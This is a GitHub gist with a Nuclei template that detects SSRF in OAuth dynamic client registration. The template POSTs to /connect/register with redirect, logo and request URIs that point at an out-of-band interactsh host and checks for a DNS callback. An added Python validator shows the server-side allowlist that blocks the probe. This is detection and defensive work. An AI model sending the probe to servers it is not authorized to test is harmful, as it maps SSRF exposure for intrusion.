Gist: emadshanab/2ecc0850e39f9e9f3a0571143a393d08
I created this YAML script to work with Nuclei to find possible SSRF vulnerabilities in an automated way.
id: ssrf-via-oauth-misconfig

info:
  name: SSRF due to misconfiguration in OAuth
  author: KabirSuda
  severity: medium
  description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
  tags: misconfig,oob,oauth
  reference: https://portswigger.net/research/hidden-oauth-attack-vectors

requests:
  - raw:
      - |
        POST /connect/register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
        Accept-Language: en-US,en;q=0.9
        Connection: close

        {
          "application_type": "web",
          "redirect_uris": ["https://{{interactsh-url}}/callback"],
          "client_name": "{{Hostname}}",
          "logo_uri": "https://{{interactsh-url}}/favicon.ico",
          "subject_type": "pairwise",
          "token_endpoint_auth_method": "client_secret_basic",
          "request_uris": ["https://{{interactsh-url}}"]
        }

    # {{interactsh-url}} is the out-of-band host Nuclei provisions for this run;
    # a hit on it means the server resolved one of the URLs from the body.
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"
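Added example (not part of the gist or of Nuclei) showing the server-side control this template probes for: an allowlist check over the URL-bearing fields of a dynamic client registration body, applied before the authorization server resolves any of them. The allowed hosts, the `.invalid` placeholder standing in for the out-of-band host, and the sample body are constructed.

```python
"""Server-side allowlist check for OIDC dynamic client registration bodies.
Added example, not part of the gist: the template above only succeeds if the
server resolves attacker-supplied URLs from the body, so refuse them first."""
import ipaddress
import json
from typing import Optional
from urllib.parse import urlsplit

# URL-bearing fields: the first three are what the template fills, jwks_uri is
# another RFC 7591 field a server may fetch. Allowlist is constructed.
URL_FIELDS = ("redirect_uris", "logo_uri", "request_uris", "jwks_uri")
ALLOWED_HOSTS = {"app.example.com", "static.example.com"}


def url_problem(url: str) -> Optional[str]:
    """Reason the URL must be refused, or None if it is acceptable."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return "scheme is not https"
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
        return "IP literal host"  # loopback, link-local metadata ranges, etc.
    except ValueError:
        pass
    return None if host in ALLOWED_HOSTS else "host %r not allowlisted" % host


def validate_registration(body: str) -> dict:
    """Map each offending field to its reasons; an empty dict means accept."""
    data = json.loads(body)
    rejected = {}
    for field in URL_FIELDS:
        values = data.get(field)
        if values is None:
            continue
        if isinstance(values, str):
            values = [values]
        reasons = [p for p in map(url_problem, values) if p]
        if reasons:
            rejected[field] = reasons
    return rejected


PROBE_BODY = json.dumps({  # constructed; placeholder host stands in for {{interactsh-url}}
    "application_type": "web", "subject_type": "pairwise",
    "token_endpoint_auth_method": "client_secret_basic", "client_name": "target.example.com",
    "redirect_uris": ["https://oob.placeholder.invalid/callback"],
    "logo_uri": "https://oob.placeholder.invalid/favicon.ico",
    "request_uris": ["https://oob.placeholder.invalid"],
})
```

A registration whose URL fields all point at allowlisted hosts returns an empty dict; the probe body above is rejected on all three fields before any fetch or redirect happens.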